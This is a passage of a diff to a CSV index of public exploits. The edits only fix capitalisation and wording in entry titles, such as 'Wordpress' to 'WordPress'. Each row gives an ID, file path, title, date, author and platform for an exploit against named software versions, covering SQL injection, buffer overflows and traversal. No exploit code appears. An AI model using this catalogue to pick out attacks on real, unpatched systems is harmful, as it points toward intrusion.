- Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,dos,0 22075,platforms/php/webapps/22075.txt,"Ultimate PHP Board 1.0 final Beta - viewtopic.php Directory Contents Browsing",2002-11-08,euronymous,php,webapps,0 22076,platforms/php/webapps/22076.txt,"Ultimate PHP Board Board 1.0 final Beta - viewtopic.php Cross-Site Scripting",2002-11-08,euronymous,php,webapps,0 22077,platforms/php/webapps/22077.txt,"vBulletin 2.2.7/2.2.8 - HTML Injection",2002-11-09,"Dorin Balanica",php,webapps,0 -22078,platforms/windows/remote/22078.txt,"mollensoft software enceladus server suite 2.6.1/3.9 - Directory Traversal",2002-11-09,luca.ercoli@inwind.it,windows,remote,0 +22078,platforms/windows/remote/22078.txt,"Mollensoft software Enceladus server suite 2.6.1/3.9 - Directory Traversal",2002-11-09,luca.ercoli@inwind.it,windows,remote,0 22079,platforms/linux/dos/22079.sh,"ProFTPd 1.2.x - STAT Command Denial of Service",2002-12-09,"Rob klein Gunnewiek",linux,dos,0 22080,platforms/php/webapps/22080.txt,"Xoops 1.3.5 - Private Message System Font Attributes HTML Injection",2002-11-09,"fred magistrat",php,webapps,0 22081,platforms/windows/dos/22081.pl,"Mollensoft Software Enceladus Server Suite 3.9 - FTP Command Buffer Overflow",2002-12-09,"Tamer Sahin",windows,dos,0 @@ -19351,11 +19352,11 @@ id,file,description,date,author,platform,type,port 22089,platforms/php/webapps/22089.txt,"PHP-Nuke 6.0 - Web Mail Remote PHP Script Execution",2002-12-16,"Ulf Harnhammar",php,webapps,0 22090,platforms/php/webapps/22090.txt,"PHP-Nuke 6.0 - Web Mail Script Injection",2002-12-16,"Ulf Harnhammar",php,webapps,0 22091,platforms/linux/remote/22091.c,"zkfingerd SysLog 0.9.1 - Format String",2002-12-16,"Marceta Milos",linux,remote,0 -22092,platforms/multiple/webapps/22092.py,"ManageEngine Security Manager Plus 5.5 build 5505 - Path Traversal",2012-10-19,xistence,multiple,webapps,0 +22092,platforms/multiple/webapps/22092.py,"ManageEngine Security Manager Plus 5.5 build 5505 - Directory Traversal",2012-10-19,xistence,multiple,webapps,0 22093,platforms/multiple/remote/22093.py,"ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM/root SQL Injection",2012-10-19,xistence,multiple,remote,0 22094,platforms/windows/remote/22094.rb,"ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM SQL Injection (Metasploit)",2012-10-19,xistence,windows,remote,0 -22097,platforms/php/webapps/22097.txt,"Joomla Freestyle Support 1.9.1.1447 - (com_fss) SQL Injection",2012-10-19,D4NB4R,php,webapps,0 -22098,platforms/php/webapps/22098.txt,"Joomla Tags - 'index.php tag parameter' SQL Injection",2012-10-19,D4NB4R,php,webapps,0 +22097,platforms/php/webapps/22097.txt,"Joomla FreeStyle Support 1.9.1.1447 - (com_fss) SQL Injection",2012-10-19,D4NB4R,php,webapps,0 +22098,platforms/php/webapps/22098.txt,"Joomla Tags - 'index.php tag Parameter' SQL Injection",2012-10-19,D4NB4R,php,webapps,0 22099,platforms/php/webapps/22099.txt,"CMSQLite 1.3.2 - Multiple Vulnerabilities",2012-10-19,Vulnerability-Lab,php,webapps,0 22100,platforms/windows/dos/22100.txt,"Microsoft Internet Explorer 9 - Cross-Site Scripting Filter Bypass",2012-10-19,"Jean Pascal Pereira",windows,dos,0 22101,platforms/linux/remote/22101.c,"zkfingerd 0.9.1 - say() Format String",2002-12-16,"Marceta Milos",linux,remote,0 @@ -19400,8 +19401,8 @@ id,file,description,date,author,platform,type,port 22140,platforms/multiple/remote/22140.c,"Half-Life StatsMe 2.6.x Plugin - MakeStats Format String",2003-01-10,greuff@void.at,multiple,remote,0 22141,platforms/linux/remote/22141.c,"Half-Life AdminMod 2.50 Plugin - Remote Format String",2003-01-10,greuff,linux,remote,0 22142,platforms/windows/remote/22142.c,"Half-Life 1.1 Client - Server Message Format String",2003-01-10,greuff,windows,remote,0 -22143,platforms/linux/remote/22143.txt,"BRS WebWeaver 1.0 1 - MKDir Directory Traversal",2003-01-10,euronymous,linux,remote,0 -22144,platforms/windows/remote/22144.txt,"Xynph FTP Server 1.0 - Relative Path Directory Traversal",2003-01-11,"Zero-X www.lobnan.de Team",windows,remote,0 +22143,platforms/linux/remote/22143.txt,"BRS Webweaver 1.0 1 - MKDir Directory Traversal",2003-01-10,euronymous,linux,remote,0 +22144,platforms/windows/remote/22144.txt,"Xynph FTP Server 1.0 - Directory Traversal",2003-01-11,"Zero-X www.lobnan.de Team",windows,remote,0 22145,platforms/multiple/remote/22145.txt,"BitMover BitKeeper 3.0 - Daemon Mode Remote Command Execution",2003-01-11,"Maurycy Prodeus ",multiple,remote,0 22146,platforms/php/webapps/22146.txt,"YABB 1.4.1 SE - Reminder.php SQL Injection",2003-01-12,"VOID.AT Security",php,webapps,0 22147,platforms/linux/remote/22147.c,"mpg123 pre0.59s - Invalid MP3 Header Memory Corruption",2003-01-13,"Gobbles Security",linux,remote,0 @@ -19410,12 +19411,12 @@ id,file,description,date,author,platform,type,port 22150,platforms/php/webapps/22150.txt,"W-Agora 4.1.6 - modules.php file Parameter Traversal Arbitrary File Access",2003-01-13,sonyy,php,webapps,0 22155,platforms/windows/dos/22155.pl,"Adobe Reader 10.1.4 - Crash (PoC)",2012-10-22,coolkaveh,windows,dos,0 22151,platforms/php/webapps/22151.txt,"Movable Type Pro 5.13en - Persistent Cross-Site Scripting",2012-10-22,sqlhacker,php,webapps,0 -22152,platforms/php/webapps/22152.txt,"Joomla Commedia Plugin - 'index.php task parameter' SQL Injection",2012-10-22,D4NB4R,php,webapps,0 -22153,platforms/php/webapps/22153.pl,"Joomla Kunena Component - 'index.php search parameter' SQL Injection",2012-10-22,D35m0nd142,php,webapps,0 +22152,platforms/php/webapps/22152.txt,"Joomla Commedia Plugin - 'index.php task Parameter' SQL Injection",2012-10-22,D4NB4R,php,webapps,0 +22153,platforms/php/webapps/22153.pl,"Joomla Kunena Component - 'index.php search Parameter' SQL Injection",2012-10-22,D35m0nd142,php,webapps,0 22154,platforms/windows/dos/22154.pl,"RealPlayer 15.0.6.14.3gp - Crash (PoC)",2012-10-22,coolkaveh,windows,dos,0 22156,platforms/php/webapps/22156.txt,"White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2012-10-22,pcsjj,php,webapps,0 -22157,platforms/php/webapps/22157.txt,"Schoolhos CMS Beta 2.29 - (index.php id parameter) SQL Injection",2012-10-22,Cumi,php,webapps,0 -22158,platforms/php/webapps/22158.txt,"Wordpress Plugin social discussions 6.1.1 - Multiple Vulnerabilities",2012-10-22,waraxe,php,webapps,0 +22157,platforms/php/webapps/22157.txt,"Schoolhos CMS Beta 2.29 - (index.php id Parameter) SQL Injection",2012-10-22,Cumi,php,webapps,0 +22158,platforms/php/webapps/22158.txt,"WordPress Plugin social discussions 6.1.1 - Multiple Vulnerabilities",2012-10-22,waraxe,php,webapps,0 22159,platforms/php/webapps/22159.txt,"subrion CMS 2.2.1 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0 22160,platforms/php/webapps/22160.txt,"atutor 1.2 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0 22161,platforms/windows/remote/22161.rb,"Turbo FTP Server 1.30.823 - PORT Overflow",2012-10-23,Metasploit,windows,remote,21 @@ -19438,13 +19439,13 @@ id,file,description,date,author,platform,type,port 22178,platforms/multiple/remote/22178.xml,"Sun ONE Unified Development Server 5.0 - Recursive Document Type Definition",2003-01-15,"Sun Microsystems",multiple,remote,0 22179,platforms/multiple/remote/22179.pl,"CSO Lanifex Outreach Project Tool 0.946b - Request Origin Spoofing",2003-01-16,"Martin Eiszner",multiple,remote,0 22180,platforms/php/webapps/22180.txt,"PHPLinks 2.1.2 - Add Site HTML Injection",2003-01-16,JeiAr,php,webapps,0 -22181,platforms/php/webapps/22181.txt,"ClanSphere 2011.3 - (cs_lang cookie parameter) Local File Inclusion",2012-10-23,blkhtc0rp,php,webapps,0 +22181,platforms/php/webapps/22181.txt,"ClanSphere 2011.3 - (cs_lang cookie Parameter) Local File Inclusion",2012-10-23,blkhtc0rp,php,webapps,0 22182,platforms/php/webapps/22182.pl,"phpBB 2.0.3 - privmsg.php SQL Injection",2003-01-17,"Ulf Harnhammar",php,webapps,0 22183,platforms/linux/dos/22183.c,"GameSpy 3D 2.62 - Packet Amplification Denial of Service",2003-01-17,"Mike Kristovich",linux,dos,0 22184,platforms/windows/remote/22184.pl,"GlobalScape CuteFTP 5.0 - LIST Response Buffer Overflow",2003-03-26,snooq,windows,remote,0 22185,platforms/windows/remote/22185.txt,"Sambar Server 5.x - results.stm Cross-Site Scripting",2003-01-20,galiarept,windows,remote,0 22186,platforms/php/webapps/22186.txt,"MyRoom 3.5 GOLD - save_item.php Arbitrary File Upload",2003-01-20,frog,php,webapps,0 -22187,platforms/linux/remote/22187.txt,"CVS 1.11.x - Directory Request Double Free Heap Corruption",2003-01-20,"Stefan Esser",linux,remote,0 +22187,platforms/linux/remote/22187.txt,"CVS 1.11.x - Directory Request Double-Free Heap Corruption",2003-01-20,"Stefan Esser",linux,remote,0 22279,platforms/php/webapps/22279.txt,"GONiCUS System Administrator 1.0 - Remote File Inclusion",2003-02-24,"Karol Wiesek",php,webapps,0 22189,platforms/linux/local/22189.txt,"MTink 0.9.x - Printer Status Monitor Environment Variable Buffer Overflow",2003-01-21,"Karol Wiesek",linux,local,0 22190,platforms/linux/local/22190.txt,"ESCPUtil 1.15.2 2 - Local Printer Name Buffer Overflow",2003-01-21,"Karol Wiesek",linux,local,0 @@ -19459,7 +19460,7 @@ id,file,description,date,author,platform,type,port 22199,platforms/cgi/webapps/22199.txt,"GNU Mailman 2.1 - Error Page Cross-Site Scripting",2003-01-24,webmaster@procheckup.com,cgi,webapps,0 22200,platforms/multiple/remote/22200.txt,"SyGate 5.0 - Insecure UDP Source Port Firewall Bypass Weak Default Configuration",2003-01-24,"David Fernández",multiple,remote,0 22201,platforms/multiple/remote/22201.txt,"List Site Pro 2.0 - User Database Delimiter Injection",2003-01-24,Statix,multiple,remote,0 -22202,platforms/php/webapps/22202.txt,"FTLS GuestBook 1.1 - Script Injection",2003-01-25,BrainRawt,php,webapps,0 +22202,platforms/php/webapps/22202.txt,"FTLS Guestbook 1.1 - Script Injection",2003-01-25,BrainRawt,php,webapps,0 22203,platforms/solaris/local/22203.txt,"Sun Solaris 2.5/2.6/7.0/8/9 AT Command - Arbitrary File Deletion",2003-01-27,"Wojciech Purczynski",solaris,local,0 22204,platforms/cgi/webapps/22204.txt,"MultiHTML 1.5 - File Disclosure",2000-09-13,"Niels Heinen",cgi,webapps,0 22205,platforms/linux/remote/22205.txt,"Apache Tomcat 3.x - Null Byte Directory/File Disclosure",2003-01-26,"Jouko Pynnönen",linux,remote,0 @@ -19531,8 +19532,8 @@ id,file,description,date,author,platform,type,port 22273,platforms/linux/dos/22273.c,"Zlib 1.1.4 - Compression Library gzprintf() Buffer Overrun (1)",2003-02-23,"Richard Kettlewel",linux,dos,0 22274,platforms/linux/remote/22274.c,"Zlib 1.1.4 - Compression Library gzprintf() Buffer Overrun (2)",2003-02-23,CrZ,linux,remote,0 22275,platforms/linux/remote/22275.pl,"Webmin 0.9x / Usermin 0.9x/1.0 - Session ID Spoofing Unauthenticated Access",2003-02-20,"Carl Livitt",linux,remote,0 -22276,platforms/php/webapps/22276.txt,"Nuked-Klan 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2003-02-23,"gregory Le Bras",php,webapps,0 -22277,platforms/php/webapps/22277.txt,"Nuked-Klan 1.3 - Remote Information Disclosure",2003-02-23,"gregory Le Bras",php,webapps,0 +22276,platforms/php/webapps/22276.txt,"Nuked-klaN 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2003-02-23,"gregory Le Bras",php,webapps,0 +22277,platforms/php/webapps/22277.txt,"Nuked-klaN 1.3 - Remote Information Disclosure",2003-02-23,"gregory Le Bras",php,webapps,0 22278,platforms/linux/remote/22278.pl,"moxftp 2.2 - Banner Parsing Buffer Overflow",2003-02-24,"Knud Erik Hojgaard",linux,remote,0 22280,platforms/windows/remote/22280.txt,"Microsoft Outlook2000/Express 6.0 - Arbitrary Program Execution",2003-02-24,http-equiv,windows,remote,0 22281,platforms/php/webapps/22281.php,"Mambo Site Server 4.0.12 RC2 - Cookie Validation",2003-02-24,"Simen Bergo",php,webapps,0 @@ -19546,16 +19547,16 @@ id,file,description,date,author,platform,type,port 22289,platforms/windows/remote/22289.c,"Microsoft Windows XP/ME - Help and Support Center Buffer Overflow",2003-02-26,s0h,windows,remote,0 22290,platforms/windows/dos/22290.c,"Electronic Arts Battlefield 1942 1.2/1.3 - Remote Administration Authentication Buffer Overflow",2003-02-26,greuff,windows,dos,0 22291,platforms/linux/remote/22291.c,"AMX Mod 0.9.2 - Remote 'amx_say' Format String",2003-02-26,greuff,linux,remote,0 -22292,platforms/unix/remote/22292.pl,"Frisk F-Prot Antivirus 3.12b - Command Line Scanner Buffer Overflow",2003-02-26,"Knud Erik Hojgaard",unix,remote,0 +22292,platforms/unix/remote/22292.pl,"Frisk F-Prot AntiVirus 3.12b - Command Line Scanner Buffer Overflow",2003-02-26,"Knud Erik Hojgaard",unix,remote,0 22293,platforms/php/webapps/22293.txt,"E-theni - Remote File Inclusion Command Execution",2003-01-06,frog,php,webapps,0 22294,platforms/linux/dos/22294.c,"TCPDump 3.x - Malformed ISAKMP Packet Denial of Service",2003-03-01,"The Salvia Twist",linux,dos,0 22295,platforms/php/webapps/22295.txt,"Invision Board 1.1.1 - ipchat.php Remote File Inclusion",2003-02-27,frog,php,webapps,0 22296,platforms/multiple/remote/22296.txt,"Axis Communications HTTP Server 2.x - Messages Information Disclosure",2003-02-28,"Martin Eiszner",multiple,remote,0 22297,platforms/php/webapps/22297.pl,"Typo3 3.5 b5 - showpic.php File Enumeration",2003-02-28,"Martin Eiszner",php,webapps,0 22298,platforms/php/webapps/22298.txt,"Typo3 3.5 b5 - Translations.php Remote File Inclusion",2003-02-28,"Martin Eiszner",php,webapps,0 -22300,platforms/php/webapps/22300.txt,"Wordpress Easy Webinar Plugin - Blind SQL Injection",2012-10-28,"Robert Cooper",php,webapps,0 +22300,platforms/php/webapps/22300.txt,"WordPress Easy Webinar Plugin - Blind SQL Injection",2012-10-28,"Robert Cooper",php,webapps,0 22301,platforms/windows/remote/22301.html,"Aladdin Knowledge System Ltd - PrivAgent.ocx ChooseFilePath Buffer Overflow",2012-10-28,b33f,windows,remote,0 -22302,platforms/windows/dos/22302.rb,"hMailServer 5.3.3 - IMAP Remote Crash (PoC)",2012-10-28,"John Smith",windows,dos,0 +22302,platforms/windows/dos/22302.rb,"hMAilServer 5.3.3 - IMAP Remote Crash (PoC)",2012-10-28,"John Smith",windows,dos,0 22303,platforms/windows/dos/22303.pl,"Microsoft Windows Help program - (WinHlp32.exe) Crash (PoC)",2012-10-28,coolkaveh,windows,dos,0 22304,platforms/multiple/remote/22304.rb,"ManageEngine Security Manager Plus 5.5 build 5505 - SQL Injection",2012-10-28,Metasploit,multiple,remote,0 22305,platforms/windows/remote/22305.rb,"HP Operations Agent Opcode - coda.exe 0x8c Buffer Overflow",2012-10-29,Metasploit,windows,remote,0 @@ -19588,7 +19589,7 @@ id,file,description,date,author,platform,type,port 22335,platforms/unix/local/22335.pl,"Tower Toppler 0.99.1 - Display Variable Local Buffer Overflow",2002-03-02,"Knud Erik Hojgaard",unix,local,0 22336,platforms/php/webapps/22336.txt,"PHPPing 0.1 - Remote Command Execution",2003-03-06,"gregory Le Bras",php,webapps,0 22337,platforms/cgi/webapps/22337.txt,"Wordit Logbook 098b3 - Logbook.pl Remote Command Execution",2003-03-07,"Aleksey Sintsov",cgi,webapps,0 -22338,platforms/windows/remote/22338.txt,"Clearswift MailSweeper 4.x - Malformed MIME Attachment Filter Bypass",2003-03-07,http-equiv,windows,remote,0 +22338,platforms/windows/remote/22338.txt,"Clearswift MAILsweeper 4.x - Malformed MIME Attachment Filter Bypass",2003-03-07,http-equiv,windows,remote,0 22339,platforms/php/webapps/22339.txt,"SimpleBBS 1.0.6 - users.php Insecure File Permissions",2003-03-07,flur,php,webapps,0 22340,platforms/linux/local/22340.txt,"MySQL 3.23.x - mysqld Privilege Escalation",2003-03-08,bugsman@libero.it,linux,local,0 22341,platforms/windows/remote/22341.txt,"Opera 6.0/7.0 - Long Filename Download Buffer Overrun",2003-03-10,nesumin,windows,remote,0 @@ -19615,20 +19616,20 @@ id,file,description,date,author,platform,type,port 22362,platforms/linux/local/22362.c,"Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Privilege Escalation (1)",2003-03-17,anszom@v-lo.krakow.pl,linux,local,0 22363,platforms/linux/local/22363.c,"Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Privilege Escalation (2)",2003-04-10,"Wojciech Purczynski",linux,local,0 22364,platforms/cgi/webapps/22364.c,"Outblaze Webmail - Cookie Authentication Bypass",2003-03-17,"dong-h0un U",cgi,webapps,0 -22365,platforms/windows/remote/22365.pl,"Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow (1)",2003-03-24,mat,windows,remote,0 -22366,platforms/windows/remote/22366.c,"Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow (2)",2003-03-31,ThreaT,windows,remote,0 -22367,platforms/windows/remote/22367.txt,"Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow (3)",2003-04-04,"Morning Wood",windows,remote,0 -22368,platforms/windows/remote/22368.txt,"Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow (4)",2003-03-17,aT4r@3wdesign.es,windows,remote,0 +22365,platforms/windows/remote/22365.pl,"Microsoft IIS 5.0 (Windows XP/2000/NT 4) - WebDAV ntdll.dll Buffer Overflow (1)",2003-03-24,mat,windows,remote,0 +22366,platforms/windows/remote/22366.c,"Microsoft IIS 5.0 (Windows XP/2000/NT 4) - WebDAV ntdll.dll Buffer Overflow (2)",2003-03-31,ThreaT,windows,remote,0 +22367,platforms/windows/remote/22367.txt,"Microsoft IIS 5.0 (Windows XP/2000/NT 4) - WebDAV ntdll.dll Buffer Overflow (3)",2003-04-04,"Morning Wood",windows,remote,0 +22368,platforms/windows/remote/22368.txt,"Microsoft IIS 5.0 (Windows XP/2000/NT 4) - WebDAV ntdll.dll Buffer Overflow (4)",2003-03-17,aT4r@3wdesign.es,windows,remote,0 22369,platforms/linux/remote/22369.txt,"Ximian Evolution 1.x - UUEncoding Parsing Memory Corruption",2003-03-17,"Core Security",linux,remote,0 22370,platforms/linux/dos/22370.txt,"Ximian Evolution 1.x - UUEncoding Denial of Service",2003-03-17,"Core Security",linux,dos,0 22371,platforms/linux/remote/22371.txt,"Ximian Evolution 1.x - MIME image/* Content-Type Data Inclusion",2003-03-19,"Core Security",linux,remote,0 22372,platforms/php/webapps/22372.txt,"vam shop 1.69 - Multiple Vulnerabilities",2012-10-31,"Security Effect Team",php,webapps,0 22373,platforms/php/webapps/22373.txt,"PG Dating Pro 1.0 CMS - Multiple Vulnerabilities",2012-10-31,Vulnerability-Lab,php,webapps,0 -22374,platforms/php/webapps/22374.txt,"Wordpress Plugin foxypress 0.4.2.5 - Multiple Vulnerabilities",2012-10-31,waraxe,php,webapps,0 +22374,platforms/php/webapps/22374.txt,"WordPress Plugin foxypress 0.4.2.5 - Multiple Vulnerabilities",2012-10-31,waraxe,php,webapps,0 22375,platforms/windows/remote/22375.rb,"Aladdin Knowledge System Ltd - ChooseFilePath Buffer Overflow",2012-11-01,Metasploit,windows,remote,0 22376,platforms/linux/local/22376.txt,"GNOME Eye Of Gnome 1.0.x/1.1.x/2.2 - Format String",2003-03-28,"Core Security",linux,local,0 22377,platforms/cgi/webapps/22377.txt,"Kebi Academy 2001 - Input Validation",2003-03-17,"dong-h0un U",cgi,webapps,0 -22378,platforms/php/webapps/22378.txt,"MyAbraCadaWeb 1.0 - Full Path Disclosure",2003-03-17,"gregory Le Bras",php,webapps,0 +22378,platforms/php/webapps/22378.txt,"MyABraCaDaWeb 1.0 - Full Path Disclosure",2003-03-17,"gregory Le Bras",php,webapps,0 22379,platforms/linux/remote/22379.c,"PXE Server 2.0 - Remote Buffer Overrun",2003-03-13,CrZ,linux,remote,0 22380,platforms/cgi/webapps/22380.pl,"Smart Search 4.25 - Remote Command Execution",2003-01-05,knight420,cgi,webapps,0 22381,platforms/multiple/remote/22381.txt,"SIPS 0.2.2 - User Information Disclosure",2003-03-18,dwcgr0up,multiple,remote,0 @@ -19646,13 +19647,13 @@ id,file,description,date,author,platform,type,port 22393,platforms/php/webapps/22393.txt,"osCommerce 2.1/2.2 - Checkout_Payment.php Error Output Cross-Site Scripting",2003-03-20,"iProyectos group",php,webapps,0 22394,platforms/hardware/remote/22394.txt,"Check Point FW-1 Syslog Daemon - Unfiltered Escape Sequence",2003-03-21,"Dr. Peter Bieringer",hardware,remote,0 22395,platforms/windows/dos/22395.txt,"eDonkey Clients 0.44/0.45 - Multiple Chat Dialog Resource Consumption",2003-03-21,"Auriemma Luigi",windows,dos,0 -22396,platforms/php/webapps/22396.txt,"Wordpress bbPress Plugin - Multiple Vulnerabilities",2012-11-01,Dark-Puzzle,php,webapps,0 +22396,platforms/php/webapps/22396.txt,"WordPress bbPress Plugin - Multiple Vulnerabilities",2012-11-01,Dark-Puzzle,php,webapps,0 22397,platforms/windows/dos/22397.txt,"SIEMENS Sipass Integrated 2.6 Ethernet Bus - Arbitrary Pointer Dereference",2012-11-01,"Lucas Apa",windows,dos,0 -22398,platforms/php/webapps/22398.php,"Invision Power Board 3.3.4 - 'unserialize()' PHP Code Execution",2012-11-01,EgiX,php,webapps,0 +22398,platforms/php/webapps/22398.php,"Invision Power Board 3.3.4 - 'Unserialize()' PHP Code Execution",2012-11-01,EgiX,php,webapps,0 22399,platforms/php/webapps/22399.txt,"Endpoint Protector 4.0.4.2 - Multiple Persistent Cross-Site Scripting",2012-11-01,"CYBSEC Labs",php,webapps,0 22401,platforms/windows/dos/22401.php,"Microsoft Internet Explorer 9 - Memory Corruption Crash (PoC)",2012-11-01,"Jean Pascal Pereira",windows,dos,0 22402,platforms/windows/dos/22402.txt,"RealPlayer 15.0.6.14(.3g2) - WriteAV Crash (PoC)",2012-11-01,coolkaveh,windows,dos,0 -22403,platforms/php/webapps/22403.txt,"Joomla Spider Catalog - 'index.php product_id parameter' SQL Injection",2012-11-01,D4NB4R,php,webapps,0 +22403,platforms/php/webapps/22403.txt,"Joomla Spider Catalog - 'index.php Product_ID Parameter' SQL Injection",2012-11-01,D4NB4R,php,webapps,0 22405,platforms/php/webapps/22405.txt,"MyBB Follower User Plugin - SQL Injection",2012-11-01,Zixem,php,webapps,0 22406,platforms/linux/dos/22406.txt,"Konqueror 4.7.3 - Memory Corruption",2012-11-01,"Tim Brown",linux,dos,0 22407,platforms/hardware/dos/22407.txt,"Netgear 1.x - ProSafe VPN Firewall Web Interface Login Denial of Service",2003-03-21,"Paul Kurczaba",hardware,dos,0 @@ -19675,7 +19676,7 @@ id,file,description,date,author,platform,type,port 22424,platforms/php/webapps/22424.txt,"PHP-Nuke 6.0/6.5 Forum Module - viewforum.php SQL Injection",2003-03-25,frog,php,webapps,0 22425,platforms/php/dos/22425.php,"PHP 4.x - socket_recv() Signed Integer Memory Corruption",2003-03-26,"Sir Mordred",php,dos,0 22426,platforms/php/dos/22426.php,"PHP 4.x - socket_recvfrom() Signed Integer Memory Corruption",2003-03-26,"Sir Mordred",php,dos,0 -22427,platforms/php/webapps/22427.txt,"Wordpress All Video Gallery 1.1 Plugin - SQL Injection",2012-11-02,"Ashiyane Digital Security Team",php,webapps,0 +22427,platforms/php/webapps/22427.txt,"WordPress All Video Gallery 1.1 Plugin - SQL Injection",2012-11-02,"Ashiyane Digital Security Team",php,webapps,0 22521,platforms/php/webapps/22521.c,"XMB Forum 1.8 - member.php SQL Injection",2003-04-22,zeez@bbugs.org,php,webapps,0 22429,platforms/php/webapps/22429.txt,"vBulletin ChangUonDyU Advanced Statistics - SQL Injection",2012-11-02,Juno_okyo,php,webapps,0 22430,platforms/php/webapps/22430.txt,"PrestaShop 1.5.1 - Persistent Cross-Site Scripting",2012-11-02,"David Sopas",php,webapps,0 @@ -19690,9 +19691,9 @@ id,file,description,date,author,platform,type,port 22439,platforms/php/webapps/22439.txt,"PostNuke 0.72x Members_List Module - Full Path Disclosure",2003-03-28,rkc,php,webapps,0 22440,platforms/hardware/dos/22440.c,"D-Link DI-614+ - IP Fragment Reassembly Denial of Service",1998-04-16,humble,hardware,dos,0 22441,platforms/multiple/dos/22441.txt,"Mozilla 1.x / Opera 7.0 - LiveConnect JavaScript Denial of Service",2003-03-28,"Marc Schoenefeld",multiple,dos,0 -22442,platforms/unix/remote/22442.c,"SendMail 8.11.6 - Address Prescan Memory Corruption",2003-03-29,sorbo,unix,remote,0 -22443,platforms/php/webapps/22443.txt,"Beanwebb GuestBook 1.0 - Unauthorized Administrative Access",2003-03-29,euronymous,php,webapps,0 -22444,platforms/php/webapps/22444.txt,"Justice GuestBook 1.3 - Full Path Disclosure",2003-03-29,euronymous,php,webapps,0 +22442,platforms/unix/remote/22442.c,"Sendmail 8.11.6 - Address Prescan Memory Corruption",2003-03-29,sorbo,unix,remote,0 +22443,platforms/php/webapps/22443.txt,"Beanwebb Guestbook 1.0 - Unauthorized Administrative Access",2003-03-29,euronymous,php,webapps,0 +22444,platforms/php/webapps/22444.txt,"Justice Guestbook 1.3 - Full Path Disclosure",2003-03-29,euronymous,php,webapps,0 22445,platforms/php/webapps/22445.txt,"ScozBook 1.1 - Full Path Disclosure",2003-03-29,euronymous,php,webapps,0 22446,platforms/linux/dos/22446.txt,"EZ Server 1.0 - Long Argument Local Denial of Service",2003-03-31,"gregory Le Bras",linux,dos,0 22447,platforms/windows/dos/22447.txt,"HP Instant TopTools 5.0 - Remote Denial of Service",2003-03-31,"Erik Parker",windows,dos,0 @@ -19711,7 +19712,7 @@ id,file,description,date,author,platform,type,port 22460,platforms/windows/dos/22460.txt,"Abyss Web Server 1.1.2 - Incomplete HTTP Request Denial of Service",2003-04-05,"Auriemma Luigi",windows,dos,0 22461,platforms/php/webapps/22461.txt,"Invision Board 1.1.1 - functions.php SQL Injection",2003-04-05,"Gossi The Dog",php,webapps,0 22462,platforms/multiple/remote/22462.txt,"Interbase 6.x - External Table File Verification",2003-04-05,"Kotala Zdenek",multiple,remote,0 -22463,platforms/php/webapps/22463.txt,"Wordpress Spider Catalog 1.1 Plugin - HTML Code Injection / Cross-Site Scripting",2012-11-04,D4NB4R,php,webapps,0 +22463,platforms/php/webapps/22463.txt,"WordPress Spider Catalog 1.1 Plugin - HTML Code Injection / Cross-Site Scripting",2012-11-04,D4NB4R,php,webapps,0 22464,platforms/windows/dos/22464.txt,"Adobe Reader 11.0.0 - Stack Overflow Crash (PoC)",2012-11-04,coolkaveh,windows,dos,0 22465,platforms/windows/local/22465.txt,"Sysax FTP Automation Server 5.33 - Privilege Escalation",2012-11-04,"Craig Freyman",windows,local,0 22466,platforms/windows/remote/22466.py,"BigAnt Server 2.52 SP5 - SEH Stack Overflow ROP-based Exploit (ASLR + DEP Bypass)",2012-11-04,"Lorenzo Cantoni",windows,remote,0 @@ -19729,10 +19730,10 @@ id,file,description,date,author,platform,type,port 22478,platforms/php/webapps/22478.txt,"PHPay 2.2 - Cross-Site Scripting",2003-04-09,"Ahmet Sabri ALPER",php,webapps,0 22479,platforms/linux/remote/22479.c,"PoPToP PPTP 1.0/1.1.x - Negative read() Argument Remote Buffer Overflow",2003-04-09,"John Leach",linux,remote,0 22480,platforms/hardware/remote/22480.txt,"Linksys BEFVP4 - SNMP Community String Information Disclosure",2003-04-09,"Branson Matheson",hardware,remote,0 -22481,platforms/cgi/webapps/22481.txt,"Super GuestBook 1.0 - Sensitive Information Disclosure",2002-04-10,Over_G,cgi,webapps,0 +22481,platforms/cgi/webapps/22481.txt,"Super Guestbook 1.0 - Sensitive Information Disclosure",2002-04-10,Over_G,cgi,webapps,0 22482,platforms/cgi/webapps/22482.txt,"Guestbook 4.0 - Sensitive Information Disclosure",2003-04-10,Over_G,cgi,webapps,0 -22483,platforms/osx/dos/22483.c,"Mac OSX 10.x - DirectoryService Denial of Service",2003-04-10,"Neeko Oni",osx,dos,0 -22484,platforms/asp/webapps/22484.txt,"Ocean12 ASP GuestBook Manager 1.0 - Information Disclosure",2003-04-11,drG4njubas,asp,webapps,0 +22483,platforms/osx/dos/22483.c,"Apple Mac OS X 10.x - DirectoryService Denial of Service",2003-04-10,"Neeko Oni",osx,dos,0 +22484,platforms/asp/webapps/22484.txt,"Ocean12 ASP Guestbook Manager 1.0 - Information Disclosure",2003-04-11,drG4njubas,asp,webapps,0 22485,platforms/linux/remote/22485.c,"SheerDNS 1.0 - Information Disclosure",2003-04-14,"Jedi/Sector One",linux,remote,0 22486,platforms/cfm/webapps/22486.txt,"InstaBoard 1.3 - index.cfm SQL Injection",2003-04-14,"Jim Dew",cfm,webapps,0 22487,platforms/asp/webapps/22487.txt,"Web Wiz Site News 3.6 - Information Disclosure",2003-04-14,drG4njubas,asp,webapps,0 @@ -19771,7 +19772,7 @@ id,file,description,date,author,platform,type,port 22570,platforms/windows/remote/22570.java,"Microsoft Windows Media Player 7.1 - Skin File Code Execution",2003-05-07,"Jelmer Kuperus",windows,remote,0 22571,platforms/cgi/webapps/22571.pl,"HappyMall E-Commerce Software 4.3/4.4 - Normal_HTML.cgi Command Execution",2003-05-07,"Revin Aldi",cgi,webapps,0 